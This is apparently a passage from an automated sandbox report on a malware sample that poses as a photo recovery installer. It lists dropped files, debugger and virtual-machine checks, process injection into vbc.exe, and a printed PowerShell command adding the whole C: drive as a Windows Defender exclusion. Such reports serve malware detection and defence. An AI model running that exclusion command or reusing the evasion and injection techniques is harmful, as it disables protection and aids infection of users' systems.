            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\Qt5PrintSupport.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-C06F8.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-0N6LU.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\uninstall\unins000.exe (copy)Jump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Windows\Temp\VzUtW_3288.sysJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\icuin51.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NKCMI.tmp\_isetup\_shfoldr.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_12-5977
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeAPI coverage: 4.7 %
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeAPI coverage: 4.8 %
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe TID: 6944Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep time: -11990383647911201s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe TID: 7428Thread sleep count: 46 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe TID: 7428Thread sleep time: -92000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe TID: 7896Thread sleep time: -900000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 6241 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 3242 > 30
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_0041F300 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 0041F313h0_2_0041F300
            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00452AD4 FindFirstFileA,GetLastError,13_2_00452AD4
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00475798 FindFirstFileA,FindNextFileA,FindClose,13_2_00475798
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,13_2_0046417C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,13_2_004645F8
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose,13_2_00462BF0
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,13_2_00498FDC
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,12_2_00409B78
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeThread delayed: delay time: 60000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: svchost.exe, 00000007.00000002.2471765865.000002A7EEE4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: olume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
            Source: svchost.exe, 00000007.00000002.2471895901.000002A7EEE81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: vbc.exe, 00000005.00000002.1378646279.000001798BEA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
            Source: svchost.exe, 00000007.00000002.2471895901.000002A7EEE65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000#p
            Source: dxRwXy19pq.exe, 00000000.00000002.1329906446.000000000099B000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1329906446.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1330110847.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1251221468.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1251275002.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1251275002.000000000099A000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.000000000099A000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: svchost.exe, 00000007.00000002.2471895901.000002A7EEE65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: svchost.exe, 00000007.00000002.2471423939.000002A7EEE0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
            Source: svchost.exe, 00000007.00000002.2471895901.000002A7EEE65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
            Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
            Source: svchost.exe, 00000007.00000002.2471670893.000002A7EEE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: svchost.exe, 00000007.00000002.2471895901.000002A7EEE7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: svchost.exe, 00000007.00000002.2471670893.000002A7EEE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: svchost.exe, 00000007.00000002.2471895901.000002A7EEE81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeAPI call chain: ExitProcess graph end nodegraph_12-6774
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeAPI call chain: ExitProcess graph end nodegraph_14-60561
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004029E0 GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_004029E0
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00404810 IsDebuggerPresent,0_2_00404810
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D4E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,14_2_02D4E6BE
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00402890 LoadLibraryA,GetProcAddress,GetCurrentThread,FreeLibrary,0_2_00402890
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D35E59 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,14_2_02D35E59
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004011DC SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm,0_2_004011DC
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00401180 Sleep,SetUnhandledExceptionFilter,malloc,_initterm,GetStartupInfoA,0_2_00401180
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_0040F9F0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_0040F9F0
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00420439 SetUnhandledExceptionFilter,0_2_00420439
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D480E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_02D480E8
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
            Allocates memory in foreign processes
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140000000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140000000 value starts with: 4D5AJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeThread register set: target process: 3288Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140000000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140001000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 14007F000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140095000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 1400A0000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 1400A5000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140186000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 14026E000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 14026F000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140563000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 5380674010Jump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00402460 GetModuleFileNameA,ShellExecuteEx,GetLastError,CreateThread,0_2_00402460
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0042EE28 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,13_2_0042EE28
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00420391 AllocateAndInitializeSid,0_2_00420391
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D3E86A cpuid 14_2_02D3E86A
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: GetLocaleInfoA,12_2_0040520C
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: GetLocaleInfoA,12_2_00405258
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: GetLocaleInfoA,13_2_00408578
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: GetLocaleInfoA,13_2_004085C4
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
